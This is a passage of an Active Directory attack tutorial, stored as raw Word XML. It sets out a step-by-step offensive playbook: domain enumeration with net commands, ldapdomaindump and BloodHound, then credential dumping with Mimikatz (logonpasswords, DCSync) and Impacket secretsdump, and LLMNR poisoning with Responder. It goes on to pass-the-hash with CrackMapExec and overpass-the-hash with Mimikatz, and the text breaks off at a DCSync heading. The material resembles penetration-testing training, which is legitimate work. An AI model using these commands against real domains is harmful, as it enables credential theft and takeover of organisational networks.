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BDD0" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>What is Active Directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD8AC0" w14:textId="2E5B170D"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Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It’s widely used to manage permissions and access to network resources. Compromising AD can give attackers significant control over an organization’s infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0A75D" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Pre-requisites for AD Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D117CCA" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:num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A foothold in the domain (typically via phishing, exploitation, or lateral movement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED41B4" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:num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Credentials of a domain user account (low or high privilege).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFA8D4" w14:textId="7D65903A" w:rsidR="00111151" w:rsidRPr="007144EE" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:num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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> are crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCAF8C" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Reconnaissance and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7623B"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1. AD Domain Enumeration with net Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB03924"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Use built-in Windows commands to gather basic domain information.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6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2852"/>
        <w:gridCol w:w="3328"/>
      </w:tblGrid>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="2EFB92E6" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="821"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398CED66"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E7C3B4B"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="5E80707C" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="821"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="043F55B4"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net user /domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CC78D32"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List all users in the domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="186BE0A0" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="821"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00681D2B"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lastRenderedPageBreak/>
              <w:t>net group /domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35339F1D"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List domain groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="0958A952" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="821"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9507C1"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net group "Domain Admins" /domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="595768B4"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List members of the Domain Admins group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="5FDA41DF" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="821"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29645FCB"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net group "Enterprise Admins" /domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ABBC0A5"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List members of the Enterprise Admins group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="207E3E0C" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="821"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="531DF03C"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net localgroup administrators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E962109"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List local administrators on the current machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30BC59A3" w14:textId="77777777" w:rsidR="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261F1BCA" w14:textId="2F0011EC"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2. LDAP Enumeration with ldapdomaindump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1279EE86"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ldapdomaindump is used to dump Active Directory information using LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC051DC" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>ldapdomaindump -u 'domain/user' -p 'password' -d 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F115430"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This command will dump detailed information about the AD environment, including users, groups, computers, and GPOs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB55A86" w14:textId="77777777" w:rsidR="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D7AB87" w14:textId="6DF366A3"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3. AD Enumeration with BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADC17B6"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lastRenderedPageBreak/>
        <w:t>BloodHound helps visualize AD relationships and find attack paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08866767" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:num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Ingestor Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: SharpHound.ps1 or SharpHound.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27399C6E" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:num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Run the tool from an AD-joined system to collect data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683302C6" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Invoke-BloodHound -CollectionMethod All -DomainFQDN &lt;domain&gt; -ZipFilename &lt;output&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE4578"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Upload the ZIP file to the BloodHound interface and analyze AD attack paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BBB069" w14:textId="6F402D47" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6B7F3D" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Credential Harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD31DB"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1. Dumping Hashes with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E9193"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Mimikatz is a powerful tool for extracting credentials from memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D38746" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF95E39"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Once in Mimikatz, use the following commands:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5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2653"/>
        <w:gridCol w:w="3346"/>
      </w:tblGrid>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="1E982400" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="445"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA089B9"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD04FF4"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="757E28A4" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA9DE1B"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privilege::debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08BA7DF0"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Enable debug mode (required for credential dumping)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="699BE66F" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03EA0E39"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sekurlsa::logonpasswords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="453050E3"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Dump plaintext credentials and hashes from memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00111151" w:rsidRPr="00111151" w14:paraId="7062EDD5" w14:textId="77777777" w:rsidTr="00111151">
        <w:trPr>
          <w:trHeight w:val="445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CE42597"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lsadump::dcsync /user:Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7782CF98"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Perform a DCSync attack to dump password hashes from the domain controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E4AE8B6"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lastRenderedPageBreak/>
        <w:t>2. NTLM Hash Dumping with Secretsdump (Impacket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE49FC"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Impacket’s secretsdump.py can be used to dump password hashes from a compromised system or Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F92769" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>secretsdump.py domain/user:password@192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6998F8"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You can use NTLM hashes instead of passwords for authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E5A47" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>secretsdump.py -hashes &lt;lm&gt;:&lt;nt&gt; domain/user@192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A3D1E"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3. LLMNR/NBT-NS Poisoning with Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2087943F"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Responder captures NTLMv1/NTLMv2 hashes by poisoning LLMNR and NBT-NS requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F0164" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>sudo responder -I &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF51E43" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:num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Wait for hashes to be captured, which can later be cracked using tools like hashcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96CE60" w14:textId="308B68CC" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67781123" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Privilege Escalation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04366ADF"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1. Pass-the-Hash (PTH) with CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AEA9DB"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CrackMapExec allows the use of NTLM hashes to authenticate without knowing the password (Pass-the-Hash attack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6FCEA" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>crackmapexec smb &lt;target_ip&gt; -u &lt;username&gt; -H &lt;NTLM_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38118C5A"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If the hash is valid, this will give you access to the target machine without needing the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14422F64"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2. Overpass-the-Hash (Pass-the-Key) with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A20C8DF"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Using NTLM hashes to get Kerberos tickets (TGT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C70008" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:lastRenderedPageBreak/>
        <w:t>sekurlsa::pth /user:&lt;user&gt; /domain:&lt;domain&gt; /ntlm:&lt;hash&gt; /run:cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5917C2"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This provides a command prompt running as the user whose hash you possess.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F15A0D"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3. DCSync Attack with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D185FD6"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The DCSync attack simulates the behavior of a Domain Controller, allowing you to dump password hashes.</w:t>
      </w:r>
    </w:p>
